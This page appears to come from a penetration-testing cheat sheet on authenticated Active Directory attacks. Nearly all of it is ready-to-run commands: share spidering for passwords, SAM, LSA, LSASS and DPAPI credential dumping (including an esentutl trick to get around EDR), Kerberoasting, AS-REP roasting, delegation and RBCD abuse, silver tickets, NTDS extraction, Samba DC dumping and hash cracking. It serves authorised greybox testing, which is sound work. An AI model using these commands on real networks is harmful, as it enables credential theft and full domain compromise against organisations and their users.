🥳Authenticated

Steps for GreyBox penetration testing in Active Directory environments.

Basic Bloodhound

Once you got a valid domain account, you can send LDAP Request. This means you are able to use Bloodhound. Very simple, remotely, with bloodhound-python :

bloodhound-python -c All -d DOMAIN -u USER -p PASSWORD

Somestimes you may have some errors. You should try with --dns-tcp parameter and specify the name server IP address :

bloodhound-python -c All -d DOMAIN -u USER -p PASSWORD -ns DNS_IP --dns-tcp

This will create some .json files that you will upload in Bloodhound. Before lauching Bloodhound GUI, you have to start neo4j :

sudo neo4j start

Then, just launch bloodhound. Do not bother yourself to download it from github, just install it with apt :

sudo apt-get install bloodhound

Then, upload .json files (you can drag and drop) and enjoy.

Extended Bloodhound

Extended Bloodhound includes PKI stuff. This has been created by Olivier Lyak. You can find the fork here : https://github.com/ly4k/BloodHound

To collect data, you can use certipy :

certipy find -u username@domain -p password -bloodhound

Then you can use Lyak's custom Bloodhound GUI to visualize ESC 1 to 10.

A very useful module in netexec is spider_plus. This module will automatically dump small files accessible in the shares. Theses small files are likely to contain password/secrets.

nxc smb TARGET_IP/MASK -u USER -p PASSWORD -M spider_plus -o READ_ONLY=false

Theses files will be saved in /tmp/nxc_spider_plus directory. You can then search for password with grep, using multiple keywords like "admin", "pass", "ftp", "sql" and many others :

grep -rnw ./ -e 'password'

Dumping credentials

Remotely

Many options are available to you for credential dumping when you are admin. Here are some with netexec :

nxc smb TARGET_IP/MASK -u USER -p PASSWORD --sam
nxc smb TARGET_IP/MASK -u USER -p PASSWORD --lsa
nxc smb TARGET_IP/MASK -u USER -p PASSWORD -M lsassy
nxc smb TARGET_IP/MASK -u USER -p PASSWORD -M nanodump
nxc smb TARGET_IP/MASK -u USER -p PASSWORD -M procdump

Also, do not forget DPAPI. Either with netexec or with DonPAPI :

nxc smb TARGET_IP/MASK -u USER -p PASSWORD --dpapi
DonPAPI DOMAIN/USER:PASSWORD@TARGET_IP

In case there is an EDR or something making you impossible to retrieve SAM, SYSTEM and security, you can use esentutl.exe with nxc :

nxc smb TARGET_IP -u USER -p PASSWORD -X "esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam"
nxc smb TARGET_IP -u USER -p PASSWORD -X "esentutl.exe /y /vss C:\Windows\System32\config\SECURITY /d c:\temp\security"
nxc smb TARGET_IP -u USER -p PASSWORD -X "esentutl.exe /y /vss C:\Windows\System32\config\SYSTEM /d c:\temp\system"

Then grab it with smbclient for example.

Using domain backup key

With netexec, it will automatically detect if you are using a domain admin account. So just use it with --dpapi parameter. Otherwise, export the domain backup key :

dpapi.py backupkeys --export -t domain.local/username:password@DC_FQDN

Then, use the domain backup key on all machine, with one command. Extract all FQDN in a file (targets for example) and then :

DonPAPI -pvk pathtofile.pvk domain.local/username:password@targets

You can parse the output by using this magic one-liner :

cat DonPapiOutput.txt | grep -ae 'Firefox Password' -e 'Chrome Password' | cut -d : -f 3 | cut -d ' ' -f 2 | sort | uniq >> motdepasse.txt && cat DonPapiOutput.txt | grep -ae '\[mRemoteNG\]' | cut -d : -f 2 | cut -d ' ' -f 1 | sort | uniq >> motdepasse.txt & cat motdepasse.txt | sort | uniq | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g" > motdepasse.txt

Locally

In case you are trying to dump passwords locally, you can use cmd :

reg save HKLM\sam sam
reg save HKLM\security security
reg save HKLM\system system

Or retrieve them manually :

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SYSTEM

Then, you can retrieve passwords with secretsdump on your host :

secretsdump.py -sam sam -system system -security security LOCAL

You can also try to dump lsass memory from the task manager. Once you got the .DMP file, you can parse it with pypykatz :

pypykatz lsa minidump 'XXX.DMP'

Impersonation

To execute commands with another account :

$password = ConvertTo-SecureString 'pasword_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)
Invoke-Command -ComputerName Server01 -Credential $credential -ScriptBlock { COMMAND }

Kerberos Attacks

Kerberoast

GetUserSPNs and get hashes :

GetUserSPNs.py -request -dc-ip IP_ADDRESS DOMAIN/USERNAME -outputfile hashes.kerberoast

Once you hot hashes, you can try to crack them with hashcat :

hashcat -m 13100 hashes.kerberoast rockyou.txt -O -w 3

ASP-REP Roasting

Look for users without Kerberos pre-authentication required attribute (using credential, low privilege) :

#From Hacktricks
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

Constrained Delegation

Find delegations :

findDelegation.py DOMAIN/USER:PASSWORD

Forge a Service Ticket and log in :

getST.py -spn SRV01 'DOMAIN/USER:PASSWORD' -impersonate Administrator
export KRB5CCNAME=path_to_ccache
psexec.py -k -no-pass DOMAIN/Administrator@TARGET_IP

RBCD

This attack require to own a powerful user.

First, add a new computer to the domain or use a computer account you own (not recommanded) :

addcomputer.py -computer-name 'COMPUTER_NAME$' -computer-pass PASSWORD -dc-ip DC_IP DOMAIN/USER:PASSWORD

Then, add the new computer to the trusted list :

rbcd.py -delegate-from 'COMPUTER_NAME$' -delegate-to 'TARGET_NAME$' -dc-ip DC_IP -action 'write' DOMAIN/USER:PASSWORD

Request a service ticket and log in :

getST.py -spn 'CIFS/TARGET' -impersonate Administrator -dc-ip DC_IP 'DOMAIN/COMPUTER_NAME$:PASSWORD
export KRB5CCNAME=/home/pentest/TICKET_NAME.ccache 
psexec.py DOMAIN/USER@TARGET_IP -k -no-pass

Silver Tickets

Once you got a service account, like a machine account, you are able to forge a TGS impersonating any user on this machine :

# Find the domain SID
lookupsid.py DOMAIN/[email protected] -domain-sids
#Use the domain SID in the -domain-sid parameter
ticketer.py -nthash HASH -domain-sid DOMAIN_SID -domain DOMAIN -spn SERVICE_PRINCIPAL_NAME USER
export KRB5CCNAME=/home/pentest/TICKET_NAME.ccache
psexec.py DOMAIN/USER@TARGET_IP -k -no-pass

Errors

If you get any error regarding clock screw :

ntpdate DC_IP

NTDS Exfiltration

Remotely

Many options. With impacket :

secretsdump.py DOMAIN/Administrator:PASSWORD@DC_IP

With netexec :

nxc smb DC_IP -u Administrator -p PASSWORD -M ntdsutil

Locally

Extract theses files and retrieve them on your host :

C:\Windows\NTDS\ntds.dit
C:\Windows\System32\config\SYSTEM

Once you get these two files, you are able to extract all the informations using impacket. The ‘LOCAL’ at the end allows you to use local ntds file :

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Cracking Passwords

Use this magic one-liner to parse your NTDS file and get hashes ready to be cracked :

cat ntds.dit | cut -d : -f 4 |sort|uniq > hashes.txt

Dumping credentials on a Samba DC

If you got domain admin credential, you can do it remotely by using the net command, included in the samba package. You will also need the klist command from krb5-user package. Just install them :

sudo apt install samba
sudo apt install krb5-user

Then, you can dump the DC with the 'vampire' option included in net command :

net rpc -U administrator -S 10.10.0.20 vampire keytab test.tab --force

Then, to extract hashes from test.tab, use the klist command :

klist -k test.tab -K -e | grep arcfour-hmac | tr -s ' ' | cut -d ' ' -f 3,5 | sed 's/\ (0x/:/g' | tr -d ')'

And you will get what you want 👍

PreviousUnauthenticated NextPivot

Last updated 9 months ago

hashtagBasic Bloodhound

hashtagExtended Bloodhound

hashtagShares

hashtagDumping credentials

hashtagRemotely

hashtagUsing domain backup key

hashtagLocally

hashtagImpersonation

hashtagKerberos Attacks

hashtagKerberoast

hashtagASP-REP Roasting

hashtagConstrained Delegation

hashtagRBCD

hashtagSilver Tickets

hashtagErrors

hashtagNTDS Exfiltration

hashtagRemotely

hashtagLocally

hashtagCracking Passwords

hashtagDumping credentials on a Samba DC

Basic Bloodhound

Extended Bloodhound

Shares

Dumping credentials

Remotely

Using domain backup key

Locally

Impersonation

Kerberos Attacks

Kerberoast

ASP-REP Roasting

Constrained Delegation

RBCD

Silver Tickets

Errors

NTDS Exfiltration

Remotely

Locally

Cracking Passwords

Dumping credentials on a Samba DC